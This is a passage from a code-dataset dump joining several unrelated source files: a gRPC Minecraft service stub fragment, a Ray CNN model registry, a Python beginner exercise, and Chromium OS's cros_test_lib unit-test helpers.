insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def readCube(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dk.itu.real.ooe.MinecraftService/readCube',
minecraft__pb2.Cube.SerializeToString,
minecraft__pb2.Blocks.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def fillCube(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dk.itu.real.ooe.MinecraftService/fillCube',
minecraft__pb2.FillCubeRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 2.171875 | 2 |
python/ray/experimental/sgd/tfbench/model_config.py | cumttang/ray | 3 | 12766766 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model configurations for CNN benchmarks.
"""
from . import resnet_model
_model_name_to_imagenet_model = {
'resnet50': resnet_model.create_resnet50_model,
'resnet50_v2': resnet_model.create_resnet50_v2_model,
'resnet101': resnet_model.create_resnet101_model,
'resnet101_v2': resnet_model.create_resnet101_v2_model,
'resnet152': resnet_model.create_resnet152_model,
'resnet152_v2': resnet_model.create_resnet152_v2_model,
}
_model_name_to_cifar_model = {}
def _get_model_map(dataset_name):
    """Return the model-name registry for *dataset_name*.

    Raises ValueError for unknown dataset names.
    """
    if dataset_name == 'cifar10':
        return _model_name_to_cifar_model
    if dataset_name in ('imagenet', 'synthetic'):
        return _model_name_to_imagenet_model
    raise ValueError('Invalid dataset name: %s' % dataset_name)
def get_model_config(model_name, dataset):
    """Map model name to model network configuration."""
    model_map = _get_model_map(dataset.name)
    # EAFP: look the constructor up directly; translate a missing entry
    # into the documented ValueError.
    try:
        constructor = model_map[model_name]
    except KeyError:
        raise ValueError('Invalid model name \'%s\' for dataset \'%s\'' %
                         (model_name, dataset.name))
    return constructor()
def register_model(model_name, dataset_name, model_func):
    """Register a new model that can be obtained with `get_model_config`.

    Raises ValueError if *model_name* is already registered for the
    dataset.
    """
    registry = _get_model_map(dataset_name)
    # Refuse to silently overwrite an existing registration.
    if model_name in registry:
        raise ValueError('Model "%s" is already registered for dataset "%s"' %
                         (model_name, dataset_name))
    registry[model_name] = model_func
| 1.820313 | 2 |
Curso em Video/ex020.py | CamilliCerutti/Exercicios-de-Python-curso-em-video | 0 | 12766767 | # SORTEANDO UMA ORDEM NA LISTA
# The same teacher from exercise 19 wants to draw a random presentation
# order for the students' assignments.  Read four student names and show
# them in a randomly sampled order.
from random import sample, choice

a1 = input('Digite o nome do primeiro aluno: ')
a2 = input('Digite o nome do segundo aluno: ')
a3 = input('Digite o nome do terceiro aluno: ')
a4 = input('Digite o nome do quarto aluno: ')
lista = [a1, a2, a3, a4]
# sample(lista, k=4) returns a random permutation of all four names.
print(f'A ordem de apresentação sera a seguinte:{sample((lista),k=4)}')
| 3.765625 | 4 |
lib/cros_test_lib.py | khromiumos/chromiumos-chromite | 0 | 12766768 | <reponame>khromiumos/chromiumos-chromite
# -*- coding: utf-8 -*-
# Copyright (c) 2011 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Cros unit test library, with utility functions."""
from __future__ import print_function
import collections
import contextlib
import functools
import os
import re
import sys
import time
import unittest
import mock
import six
from six.moves import StringIO
from chromite.lib import cache
from chromite.lib import constants
from chromite.lib import commandline
from chromite.lib import cros_build_lib
from chromite.lib import cros_logging as logging
from chromite.lib import operation
from chromite.lib import osutils
from chromite.lib import parallel
from chromite.lib import partial_mock
from chromite.lib import remote_access
from chromite.lib import retry_util
from chromite.lib import terminal
from chromite.lib import timeout_util
from chromite.utils import outcap
# Define custom pytestmarks, allowing us to run/skip tests by category.
# Our Pytest marks are documented in chromite/pytest.ini.
# For more about marks, see https://docs.pytest.org/en/latest/mark.html
# Because Pytest is not always present outside the chroot, we must wrap
# our mark definitions in a try/except block.
# TODO(crbug.com/1058422): Once pytest is available in all runtime envs,
# add pytestmarks directly in test files.
try:
  import pytest  # pylint: disable=import-error
  pytest_skip = pytest.skip
  pytestmark_inside_only = pytest.mark.inside_only
  pytestmark_network_test = pytest.mark.network_test
  pytestmark_skip = pytest.mark.skip
  pytestmark_skipif = pytest.mark.skipif
except (ImportError, AttributeError):
  # If Pytest is not present, or too old to allow pytest.mark,
  # define custom pytestmarks as null functions for test files to use.
  # NOTE: the fallback pytest_skip ignores its argument and returns True;
  # the fallback pytestmark_skipif returns None.  Both are only placeholders
  # so that module-level references do not raise when pytest is missing.
  null_decorator = lambda obj: obj
  pytest_skip = lambda allow_module_level: True
  pytestmark_inside_only = null_decorator
  pytestmark_network_test = null_decorator
  pytestmark_skip = null_decorator
  pytestmark_skipif = lambda condition, reason=None: None
Directory = collections.namedtuple('Directory', ['name', 'contents'])
class GlobalTestConfig(object):
  """Global configuration for tests."""

  # By default, disable all network tests.
  RUN_NETWORK_TESTS = False
  # When set, tests may regenerate "golden" files rather than assert
  # against them.
  UPDATE_GENERATED_FILES = False
  # Running count of tests skipped because network tests were disabled.
  NETWORK_TESTS_SKIPPED = 0
def NetworkTest(reason='Skipping network test (re-run w/--network)'):
  """Decorator for unit tests. Skip the test if --network is not specified.

  May be applied to a test function/method or to a whole TestCase subclass
  (in which case the class's setUp is wrapped so every test is skipped).
  """
  def Decorator(test_item):
    @functools.wraps(test_item)
    @pytestmark_network_test
    def NetworkWrapper(*args, **kwargs):
      # The flag is consulted at call time, not decoration time, because the
      # command line is parsed after this module has been imported.
      if not GlobalTestConfig.RUN_NETWORK_TESTS:
        GlobalTestConfig.NETWORK_TESTS_SKIPPED += 1
        raise unittest.SkipTest(reason)
      test_item(*args, **kwargs)

    # We can't check GlobalTestConfig.RUN_NETWORK_TESTS here because
    # __main__ hasn't run yet. Wrap each test so that we check the flag before
    # running it.
    if isinstance(test_item, type) and issubclass(test_item, TestCase):
      test_item.setUp = Decorator(test_item.setUp)
      return test_item
    else:
      return NetworkWrapper

  return Decorator
def _FlattenStructure(base_path, dir_struct):
  """Converts a directory structure to a flat list of paths.

  Directory entries are emitted with a trailing os.sep and are recursed into;
  plain strings become file paths joined onto |base_path|.
  """
  paths = []
  for entry in dir_struct:
    if isinstance(entry, Directory):
      subdir = os.path.join(base_path, entry.name).rstrip(os.sep)
      paths.append(subdir + os.sep)
      paths += _FlattenStructure(subdir, entry.contents)
    else:
      assert isinstance(entry, six.string_types)
      paths.append(os.path.join(base_path, entry))
  return paths
def CreateOnDiskHierarchy(base_path, dir_struct):
  """Creates on-disk representation of an in-memory directory structure.

  Args:
    base_path: The absolute root of the directory structure.
    dir_struct: A recursively defined data structure that represents a
      directory tree. The basic form is a list. Elements can be file names or
      cros_test_lib.Directory objects. The 'contents' attribute of Directory
      types is a directory structure representing the contents of the
      directory.

  Examples:
    - ['file1', 'file2']
    - ['file1', Directory('directory', ['deepfile1', 'deepfile2']), 'file2']
  """
  # _FlattenStructure already prefixes every entry with |base_path|, so the
  # returned paths are used directly.  (The former extra
  # os.path.join(base_path, f) was a no-op for the documented absolute
  # |base_path| and would double-prefix a relative one.)
  for f in _FlattenStructure(base_path, dir_struct):
    if f.endswith(os.sep):
      osutils.SafeMakedirs(f)
    else:
      osutils.Touch(f, makedirs=True)
def _VerifyDirectoryIterables(existing, expected):
"""Compare two iterables representing contents of a directory.
Paths in |existing| and |expected| will be compared for exact match.
Args:
existing: An iterable containing paths that exist.
expected: An iterable of paths that are expected.
Raises:
AssertionError when there is any divergence between |existing| and
|expected|.
"""
def FormatPaths(paths):
return '\n'.join(sorted(paths))
existing = set(existing)
expected = set(expected)
unexpected = existing - expected
if unexpected:
raise AssertionError('Found unexpected paths:\n%s'
% FormatPaths(unexpected))
missing = expected - existing
if missing:
raise AssertionError('These files were expected but not found:\n%s'
% FormatPaths(missing))
def VerifyOnDiskHierarchy(base_path, dir_struct):
  """Verify that an on-disk directory tree exactly matches a given structure.

  Args:
    base_path: See CreateOnDiskHierarchy()
    dir_struct: See CreateOnDiskHierarchy()

  Raises:
    AssertionError when there is any divergence between the on-disk
    structure and the structure specified by 'dir_struct'.
  """
  on_disk = osutils.DirectoryIterator(base_path)
  wanted = _FlattenStructure(base_path, dir_struct)
  _VerifyDirectoryIterables(on_disk, wanted)
def VerifyTarball(tarball, dir_struct):
  """Compare the contents of a tarball against a directory structure.

  Args:
    tarball: Path to the tarball.
    dir_struct: See CreateOnDiskHierarchy()

  Raises:
    AssertionError when there is any divergence between the tarball and the
    structure specified by 'dir_struct'.
  """
  listing = cros_build_lib.run(['tar', '-tf', tarball], capture_output=True,
                               encoding='utf-8')
  normalized = set()
  for entry in listing.stdout.splitlines():
    path = os.path.normpath(entry)
    # normpath() drops the trailing slash tar uses to mark directories;
    # restore it so directories and files remain distinguishable.
    if entry.endswith('/'):
      path += '/'
    if path in normalized:
      raise AssertionError('Duplicate entry %r found in %r!' % (path, tarball))
    normalized.add(path)

  _VerifyDirectoryIterables(normalized, _FlattenStructure('', dir_struct))
class StackedSetup(type):
  """Metaclass to simplify unit testing and make it more robust.

  A metaclass alters the way that classes are initialized, enabling us to
  modify the class dictionary prior to the class being created. We use this
  feature here to modify the way that unit tests work a bit.

  This class does three things:
    1) When a test case is set up or torn down, we now run all setUp and
       tearDown methods in the inheritance tree.
    2) If a setUp or tearDown method fails, we still run tearDown methods
       for any test classes that were partially or completely set up.
    3) All test cases time out after TEST_CASE_TIMEOUT seconds.

  Use by adding this line before a class:
    @six.add_metaclass(StackedSetup)

  Since cros_test_lib.TestCase uses this metaclass, all derivatives of TestCase
  also inherit the above behavior (unless they override the metaclass attribute
  manually).
  """

  # Default per-test timeout in seconds; subclasses can override
  # TEST_CASE_TIMEOUT, or set it to None to disable timeouts entirely.
  TEST_CASE_TIMEOUT = 10 * 60

  def __new__(cls, clsname, bases, scope):
    """Generate the new class with pointers to original funcs & our helpers"""
    if 'setUp' in scope:
      scope['__raw_setUp__'] = scope.pop('setUp')
      scope['setUp'] = cls._stacked_setUp

    if 'tearDown' in scope:
      scope['__raw_tearDown__'] = scope.pop('tearDown')
      scope['tearDown'] = cls._stacked_tearDown

    # Modify all test* methods to time out after TEST_CASE_TIMEOUT seconds.
    timeout = scope.get('TEST_CASE_TIMEOUT', StackedSetup.TEST_CASE_TIMEOUT)
    if timeout is not None:
      for name, func in scope.items():
        if name.startswith('test') and hasattr(func, '__call__'):
          wrapper = timeout_util.TimeoutDecorator(timeout)
          scope[name] = wrapper(func)

    return type.__new__(cls, clsname, bases, scope)

  @staticmethod
  def _walk_mro_stacking(obj, attr, reverse=False):
    """Walk the stacked classes (python method resolution order)"""
    iterator = iter if reverse else reversed
    methods = (getattr(x, attr, None) for x in iterator(obj.__class__.__mro__))
    seen = set()
    for method in (x for x in methods if x):
      # im_func unwraps Python 2 unbound methods so deduplication works by
      # function identity; on Python 3 getattr falls back to the method itself.
      method = getattr(method, 'im_func', method)
      if method not in seen:
        seen.add(method)
        yield method

  @staticmethod
  def _stacked_setUp(obj):
    """Run all the setUp funcs; if any fail, run all the tearDown funcs"""
    obj.__test_was_run__ = False
    try:
      # setUps run base-class-first (reversed MRO).
      for target in StackedSetup._walk_mro_stacking(obj, '__raw_setUp__'):
        target(obj)
    except:
      # TestCase doesn't trigger tearDowns if setUp failed; thus
      # manually force it ourselves to ensure cleanup occurs.
      StackedSetup._stacked_tearDown(obj)
      raise

    # Now mark the object as fully setUp; this is done so that
    # any last minute assertions in tearDown can know if they should
    # run or not.
    obj.__test_was_run__ = True

  @staticmethod
  def _stacked_tearDown(obj):
    """Run all the tearDown funcs; if any fail, we move on to the next one"""
    exc_info = None
    # tearDowns run derived-class-first (forward MRO), mirroring setUp.
    for target in StackedSetup._walk_mro_stacking(obj, '__raw_tearDown__',
                                                  True):
      # pylint: disable=bare-except
      try:
        target(obj)
      except:
        # Preserve the exception, throw it after running
        # all tearDowns; we throw just the first also. We suppress
        # pylint's warning here since it can't understand that we're
        # actually raising the exception, just in a nonstandard way.
        if exc_info is None:
          exc_info = sys.exc_info()

    if exc_info:
      # Chuck the saved exception, w/ the same TB from
      # when it occurred.
      six.reraise(exc_info[0], exc_info[1], exc_info[2])
class TruthTable(object):
  """Class to represent a boolean truth table, useful in unit tests.

  If you find yourself testing the behavior of some function that should
  basically follow the behavior of a particular truth table, then this class
  can allow you to fully test that function without being overly verbose
  in the unit test code.

  The following usage is supported on a constructed TruthTable:
  1) Iterate over input lines of the truth table, expressed as tuples of
     bools.
  2) Access a particular input line by index, expressed as a tuple of bools.
  3) Access the expected output for a set of inputs.

  For example, say function "Foo" in module "mod" should consist of the
  following code:

  def Foo(A, B, C):
    return A and B and not C

  In the unittest for Foo, do this (the table lists the inputs whose
  expected output is True):

  def testFoo(self):
    truth_table = cros_test_lib.TruthTable(inputs=[(True, True, False)])
    for inputs in truth_table:
      a, b, c = inputs
      result = mod.Foo(a, b, c)
      self.assertEqual(result, truth_table.GetOutput(inputs))
  """

  class TruthTableInputIterator(object):
    """Iterator over the input lines of a TruthTable."""

    def __init__(self, truth_table):
      self.truth_table = truth_table
      self.next_line = 0

    def __iter__(self):
      return self

    def __next__(self):
      if self.next_line >= self.truth_table.num_lines:
        raise StopIteration()
      line = self.truth_table.GetInputs(self.next_line)
      self.next_line += 1
      return line

    # Python 2 glue.
    next = __next__

  def __init__(self, inputs, input_result=True):
    """Construct a TruthTable from given inputs.

    Args:
      inputs: Iterable of input lines, each expressed as a tuple of bools.
        Each tuple must have the same length.
      input_result: The output intended for each specified input. For
        truth tables that mostly output True it is more concise to specify
        the false inputs and then set input_result to False.
    """
    # At least one input required.
    if not inputs:
      raise ValueError('Inputs required to construct TruthTable.')

    # All input tuples share the same length; that length fixes the table
    # dimension and thus the number of lines (2**dimension).
    self.dimension = len(inputs[0])
    self.num_lines = pow(2, self.dimension)
    self.expected_inputs = set()
    self.expected_inputs_result = input_result
    for line in inputs:
      if len(line) != self.dimension:
        raise ValueError('All TruthTable inputs must have same dimension.')
      self.expected_inputs.add(line)

    # Start generator index at 0.
    self.next_line = 0

  def __len__(self):
    return self.num_lines

  def __iter__(self):
    return self.TruthTableInputIterator(self)

  def GetInputs(self, inputs_index):
    """Get the input line at the given input index.

    Args:
      inputs_index: Following must hold: 0 <= inputs_index < self.num_lines.

    Returns:
      Tuple of bools representing one line of inputs.
    """
    if not 0 <= inputs_index < self.num_lines:
      raise ValueError('This truth table has no line at index %r.'
                       % inputs_index)
    # Walk columns from most- to least-significant bit so lines come out in
    # the traditional truth-table order (F,F then F,T then T,F then T,T).
    return tuple(bool(inputs_index // pow(2, col) % 2)
                 for col in range(self.dimension - 1, -1, -1))

  def GetOutput(self, inputs):
    """Get the boolean output for the given inputs.

    Args:
      inputs: Tuple of bools, length must be equal to self.dimension.

    Returns:
      bool value representing truth table output for given inputs.
    """
    if not isinstance(inputs, tuple):
      raise TypeError('Truth table inputs must be specified as a tuple.')
    if len(inputs) != self.dimension:
      raise ValueError('Truth table inputs must match table dimension.')

    return self.expected_inputs_result == (inputs in self.expected_inputs)
class EasyAttr(dict):
  """Convenient class for simulating objects with attributes in tests.

  An EasyAttr object can be created with any attributes initialized very
  easily. Examples:

  1) An object with .id=45 and .name="Joe":
  testobj = EasyAttr(id=45, name="Joe")
  2) An object with .title.text="Big" and .owner.text="Joe":
  testobj = EasyAttr(title=EasyAttr(text="Big"), owner=EasyAttr(text="Joe"))
  """

  __slots__ = ()

  def __getattr__(self, attr):
    # Attribute access falls through to dict lookup.
    if attr in self:
      return self[attr]
    raise AttributeError(attr)

  def __delattr__(self, attr):
    if attr not in self:
      raise AttributeError(attr)
    del self[attr]

  def __setattr__(self, attr, value):
    self[attr] = value

  def __dir__(self):
    return list(self.keys())
class LogFilter(logging.Filter):
  """A simple log filter that intercepts log messages and stores them."""

  def __init__(self):
    logging.Filter.__init__(self)
    # Accumulates one line per intercepted record.
    self.messages = StringIO()

  def filter(self, record):
    self.messages.write('%s\n' % record.getMessage())
    # Return False to prevent the message from being displayed.
    return False
class LoggingCapturer(object):
  """Captures all messages emitted by the logging module.

  Usable as a context manager; capture starts on __enter__ and stops on
  __exit__.  Captured text is available via |messages|.
  """

  def __init__(self, logger_name='', log_level=logging.DEBUG):
    self.logger_name = logger_name
    self._log_level = log_level
    self._old_level = None
    self._log_filter = LogFilter()

  def __enter__(self):
    self.StartCapturing()
    return self

  def __exit__(self, exc_type, exc_val, exc_tb):
    self.StopCapturing()

  def StartCapturing(self):
    """Begin capturing logging messages."""
    target = logging.getLogger(self.logger_name)
    # Remember the effective level so StopCapturing can restore it.
    self._old_level = target.getEffectiveLevel()
    target.setLevel(self._log_level)
    target.addFilter(self._log_filter)

  def StopCapturing(self):
    """Stop capturing logging messages."""
    target = logging.getLogger(self.logger_name)
    target.setLevel(self._old_level)
    target.removeFilter(self._log_filter)

  @property
  def messages(self):
    return self._log_filter.messages.getvalue()

  def LogsMatch(self, regex):
    """Checks whether the logs match a given regex."""
    return re.search(regex, self.messages, re.MULTILINE) is not None

  def LogsContain(self, msg):
    """Checks whether the logs contain a given string."""
    return self.LogsMatch(re.escape(msg))
@six.add_metaclass(StackedSetup)
class TestCase(unittest.TestCase):
  """Basic chromite test case.

  Provides sane setUp/tearDown logic so that tearDown is correctly cleaned up.

  Takes care of saving/restoring process-wide settings like the environment so
  that sub-tests don't have to worry about getting this right.

  Also includes additional assert helpers beyond python stdlib.
  """

  # List of vars chromite is globally sensitive to and that should
  # be suppressed for tests.
  ENVIRON_VARIABLE_SUPPRESSIONS = ('CROS_CACHEDIR',)

  # The default diff is limited to 8 rows (of 80 cols). Make this unlimited
  # so we always see the output. If it's too much, people can use loggers or
  # pagers to scroll.
  maxDiff = None

  def __init__(self, *args, **kwargs):
    unittest.TestCase.__init__(self, *args, **kwargs)
    # This is set to keep pylint from complaining.
    self.__test_was_run__ = False

  @staticmethod
  def _CheckTestEnv(msg):
    """Sanity check the environment.  https://crbug.com/1015450"""
    # Note: We use print+sys.exit here instead of logging/Die because it might
    # cause errors in tests that expect their own setUp to run before their own
    # tearDown executes. By failing in the core funcs, we violate that.
    st = os.stat('/')
    if st.st_mode & 0o7777 != 0o755:
      print('%s %s\nError: The root directory has broken permissions: %o\n'
            'Fix with: sudo chmod 755 /' % (sys.argv[0], msg, st.st_mode),
            file=sys.stderr)
      sys.exit(1)
    if st.st_uid or st.st_gid:
      print('%s %s\nError: The root directory has broken ownership: %i:%i'
            ' (should be 0:0)\nFix with: sudo chown 0:0 /' %
            (sys.argv[0], msg, st.st_uid, st.st_gid), file=sys.stderr)
      sys.exit(1)

  def setUp(self):
    self._CheckTestEnv('%s.setUp' % (self.id(),))

    # Snapshot process-wide state so tearDown can restore it.
    self.__saved_env__ = os.environ.copy()
    self.__saved_cwd__ = os.getcwd()
    self.__saved_umask__ = os.umask(0o22)
    for x in self.ENVIRON_VARIABLE_SUPPRESSIONS:
      os.environ.pop(x, None)

    # Force all log lines in tests to include ANSI color prefixes, since it can
    # be configured per-user.
    os.environ['NOCOLOR'] = 'no'

  def tearDown(self):
    self._CheckTestEnv('%s.tearDown' % (self.id(),))

    osutils.SetEnvironment(self.__saved_env__)
    os.chdir(self.__saved_cwd__)
    os.umask(self.__saved_umask__)

  def id(self):
    """Return a name that can be passed in via the command line."""
    return '%s.%s' % (self.__class__.__name__, self._testMethodName)

  def __str__(self):
    """Return a pretty name that can be passed in via the command line."""
    return '[%s] %s' % (self.__module__, self.id())

  def assertRaises2(self, exception, functor, *args, **kwargs):
    """Like assertRaises, just with checking of the exception.

    Args:
      exception: The expected exception type to intecept.
      functor: The function to invoke.
      args: Positional args to pass to the function.
      kwargs: Optional args to pass to the function. Note we pull
        exact_kls, msg, and check_attrs from these kwargs.
      exact_kls: If given, the exception raise must be *exactly* that class
        type; derivatives are a failure.
      check_attrs: If given, a mapping of attribute -> value to assert on
        the resultant exception. Thus if you wanted to catch a ENOENT, you
        would do:
          assertRaises2(EnvironmentError, func, args,
                        check_attrs={'errno': errno.ENOENT})
      ex_msg: A substring that should be in the stringified exception.
      msg: The error message to be displayed if the exception isn't raised.
        If not given, a suitable one is defaulted to.

    Returns:
      The exception object.
    """
    exact_kls = kwargs.pop('exact_kls', None)
    check_attrs = kwargs.pop('check_attrs', {})
    ex_msg = kwargs.pop('ex_msg', None)
    msg = kwargs.pop('msg', None)
    if msg is None:
      msg = ("%s(*%r, **%r) didn't throw an exception"
             % (functor.__name__, args, kwargs))

    try:
      functor(*args, **kwargs)
      raise AssertionError(msg)
    except exception as e:
      if ex_msg:
        self.assertIn(ex_msg, str(e))
      if exact_kls:
        self.assertEqual(e.__class__, exception)
      bad = []
      for attr, required in check_attrs.items():
        self.assertTrue(hasattr(e, attr),
                        msg='%s lacks attr %s' % (e, attr))
        value = getattr(e, attr)
        if value != required:
          bad.append('%s attr is %s, needed to be %s'
                     % (attr, value, required))
      if bad:
        raise AssertionError('\n'.join(bad))
      return e

  def assertExists(self, path, msg=None):
    """Make sure |path| exists"""
    if os.path.exists(path):
      return

    if msg is None:
      # Walk up the tree reporting which ancestors exist to make the
      # failure message actionable.
      msg = ['path is missing: %s' % path]
      while path != '/':
        path = os.path.dirname(path)
        if not path:
          # If we're given something like "foo", abort once we get to "".
          break
        result = os.path.exists(path)
        msg.append('\tos.path.exists(%s): %s' % (path, result))
        if result:
          msg.append('\tcontents: %r' % os.listdir(path))
          break
      msg = '\n'.join(msg)

    raise self.failureException(msg)

  def assertNotExists(self, path, msg=None):
    """Make sure |path| does not exist"""
    if not os.path.exists(path):
      return

    if msg is None:
      msg = 'path exists when it should not: %s' % (path,)

    raise self.failureException(msg)

  def assertStartsWith(self, s, prefix, msg=None):
    """Asserts that |s| starts with |prefix|.

    This function should be preferred over assertTrue(s.startswith(prefix)) for
    it produces better error failure message than the other.
    """
    if s.startswith(prefix):
      return

    if msg is None:
      msg = '%s does not start with %s' % (s, prefix)

    raise self.failureException(msg)

  def assertEndsWith(self, s, suffix, msg=None):
    """Asserts that |s| ends with |suffix|.

    This function should be preferred over assertTrue(s.endswith(suffix)) for
    it produces better error failure message than the other.
    """
    if s.endswith(suffix):
      return

    if msg is None:
      # Fixed copy-paste bug: this previously said "does not starts with".
      msg = '%s does not end with %s' % (s, suffix)

    raise self.failureException(msg)

  def GetSequenceDiff(self, seq1, seq2):
    """Get a string describing the difference between two sequences.

    Args:
      seq1: First sequence to compare.
      seq2: Second sequence to compare.

    Returns:
      A string that describes how the two sequences differ.
    """
    try:
      self.assertSequenceEqual(seq1, seq2)
    except AssertionError as ex:
      return str(ex)
    else:
      return 'no differences'

  # Upstream deprecated these in Python 3, but left them in Python 2.
  # Deprecate them ourselves to help with migration. We can delete these
  # once upstream drops them.
  def _disable(deprecated, replacement):  # pylint: disable=no-self-argument
    def disable_func(*_args, **_kwargs):
      raise RuntimeError('%s() is removed in Python 3; use %s() instead' %
                         (deprecated, replacement))
    return disable_func
  assertEquals = _disable('assertEquals', 'assertEqual')
  assertNotEquals = _disable('assertNotEquals', 'assertNotEqual')
  assertAlmostEquals = _disable('assertAlmostEquals', 'assertAlmostEqual')
  assertNotAlmostEquals = _disable('assertNotAlmostEquals',
                                   'assertNotAlmostEqual')
  assert_ = _disable('assert_', 'assertTrue')
  failUnlessEqual = _disable('failUnlessEqual', 'assertEqual')
  failIfEqual = _disable('failIfEqual', 'assertNotEqual')
  failUnlessAlmostEqual = _disable('failUnlessAlmostEqual', 'assertAlmostEqual')
  failIfAlmostEqual = _disable('failIfAlmostEqual', 'assertNotAlmostEqual')
  failUnless = _disable('failUnless', 'assertTrue')
  failUnlessRaises = _disable('failUnlessRaises', 'assertRaises')
  failIf = _disable('failIf', 'assertFalse')

  # Python 3 renamed these.
  if sys.version_info.major < 3:
    assertCountEqual = unittest.TestCase.assertItemsEqual
    assertRaisesRegex = unittest.TestCase.assertRaisesRegexp
    assertRegex = unittest.TestCase.assertRegexpMatches

    assertItemsEqual = _disable('assertItemsEqual', 'assertCountEqual')
    assertRaisesRegexp = _disable('assertRaisesRegexp', 'assertRaisesRegex')
    assertRegexpMatches = _disable('assertRegexpMatches', 'assertRegex')
class LoggingTestCase(TestCase):
  """Base class for logging capturer test cases."""

  def AssertLogsMatch(self, log_capturer, regex, inverted=False):
    """Verifies a regex matches the logs."""
    if inverted:
      self.assertFalse(
          log_capturer.LogsMatch(regex),
          msg='%r found in %r' % (regex, log_capturer.messages))
    else:
      self.assertTrue(
          log_capturer.LogsMatch(regex),
          msg='%r not found in %r' % (regex, log_capturer.messages))

  def AssertLogsContain(self, log_capturer, msg, inverted=False):
    """Verifies a message is contained in the logs."""
    return self.AssertLogsMatch(log_capturer, re.escape(msg), inverted=inverted)
class OutputTestCase(TestCase):
  """Base class for cros unit tests with utility methods."""

  # These work with error output from operation module.
  # They strip the ANSI color escape wrapping produced by terminal.Color so
  # the inner message text can be matched.
  ERROR_MSG_RE = re.compile(r'^\033\[1;%dm(.+?)(?:\033\[0m)+$' %
                            (30 + terminal.Color.RED,), re.DOTALL)
  WARNING_MSG_RE = re.compile(r'^\033\[1;%dm(.+?)(?:\033\[0m)+$' %
                              (30 + terminal.Color.YELLOW,), re.DOTALL)

  def __init__(self, *args, **kwargs):
    """Base class __init__ takes a second argument."""
    TestCase.__init__(self, *args, **kwargs)
    self._output_capturer = None

  def OutputCapturer(self, *args, **kwargs):
    """Create and return OutputCapturer object."""
    self._output_capturer = outcap.OutputCapturer(*args, **kwargs)
    return self._output_capturer

  def _GetOutputCapt(self):
    """Internal access to existing OutputCapturer.

    Raises RuntimeError if output capturing was never on.
    """
    if self._output_capturer:
      return self._output_capturer

    raise RuntimeError('Output capturing was never turned on for this test.')

  def _GenCheckMsgFunc(self, prefix_re, line_re):
    """Return boolean func to check a line given |prefix_re| and |line_re|."""
    def _method(line):
      if prefix_re:
        # Prefix regexp will strip off prefix (and suffix) from line.
        match = prefix_re.search(line)

        if match:
          line = match.group(1)
        else:
          return False

      return line_re.search(line) if line_re else True

    # Compile bare string patterns so callers may pass either form.
    if isinstance(prefix_re, str):
      prefix_re = re.compile(prefix_re)
    if isinstance(line_re, str):
      line_re = re.compile(line_re)

    # Provide a description of what this function looks for in a line. Error
    # messages can make use of this.
    _method.description = None
    if prefix_re and line_re:
      _method.description = ('line matching prefix regexp %r then regexp %r' %
                             (prefix_re.pattern, line_re.pattern))
    elif prefix_re:
      _method.description = 'line matching prefix regexp %r' % prefix_re.pattern
    elif line_re:
      _method.description = 'line matching regexp %r' % line_re.pattern
    else:
      raise RuntimeError('Nonsensical usage of _GenCheckMsgFunc: '
                         'no prefix_re or line_re')

    return _method

  def _ContainsMsgLine(self, lines, msg_check_func):
    # True if any captured line satisfies the checker.
    return any(msg_check_func(ln) for ln in lines)

  def _GenOutputDescription(self, check_stdout, check_stderr):
    # Some extra logic to make an error message useful.
    # NOTE: returns None if both flags are False; callers assert at least
    # one flag is set before invoking this.
    if check_stdout and check_stderr:
      return 'stdout or stderr'
    elif check_stdout:
      return 'stdout'
    elif check_stderr:
      return 'stderr'

  def _AssertOutputContainsMsg(self, check_msg_func, invert,
                               check_stdout, check_stderr):
    assert check_stdout or check_stderr

    lines = []
    if check_stdout:
      lines.extend(self._GetOutputCapt().GetStdoutLines())
    if check_stderr:
      lines.extend(self._GetOutputCapt().GetStderrLines())

    result = self._ContainsMsgLine(lines, check_msg_func)

    # Some extra logic to make an error message useful.
    output_desc = self._GenOutputDescription(check_stdout, check_stderr)

    if invert:
      msg = ('expected %s to not contain %s,\nbut found it in:\n%s' %
             (output_desc, check_msg_func.description, lines))
      self.assertFalse(result, msg=msg)
    else:
      msg = ('expected %s to contain %s,\nbut did not find it in:\n%s' %
             (output_desc, check_msg_func.description, lines))
      self.assertTrue(result, msg=msg)

  def AssertOutputContainsError(self, regexp=None, invert=False,
                                check_stdout=True, check_stderr=False):
    """Assert requested output contains at least one error line.

    If |regexp| is non-null, then the error line must also match it.
    If |invert| is true, then assert the line is NOT found.

    Raises RuntimeError if output capturing was never on for this test.
    """
    check_msg_func = self._GenCheckMsgFunc(self.ERROR_MSG_RE, regexp)
    return self._AssertOutputContainsMsg(check_msg_func, invert,
                                         check_stdout, check_stderr)

  def AssertOutputContainsWarning(self, regexp=None, invert=False,
                                  check_stdout=True, check_stderr=False):
    """Assert requested output contains at least one warning line.

    If |regexp| is non-null, then the warning line must also match it.
    If |invert| is true, then assert the line is NOT found.

    Raises RuntimeError if output capturing was never on for this test.
    """
    check_msg_func = self._GenCheckMsgFunc(self.WARNING_MSG_RE, regexp)
    return self._AssertOutputContainsMsg(check_msg_func, invert,
                                         check_stdout, check_stderr)

  def AssertOutputContainsLine(self, regexp, invert=False,
                               check_stdout=True, check_stderr=False):
    """Assert requested output contains line matching |regexp|.

    If |invert| is true, then assert the line is NOT found.

    Raises RuntimeError if output capturing was never on for this test.
    """
    check_msg_func = self._GenCheckMsgFunc(None, regexp)
    return self._AssertOutputContainsMsg(check_msg_func, invert,
                                         check_stdout, check_stderr)

  def _AssertOutputEndsInMsg(self, check_msg_func,
                             check_stdout, check_stderr):
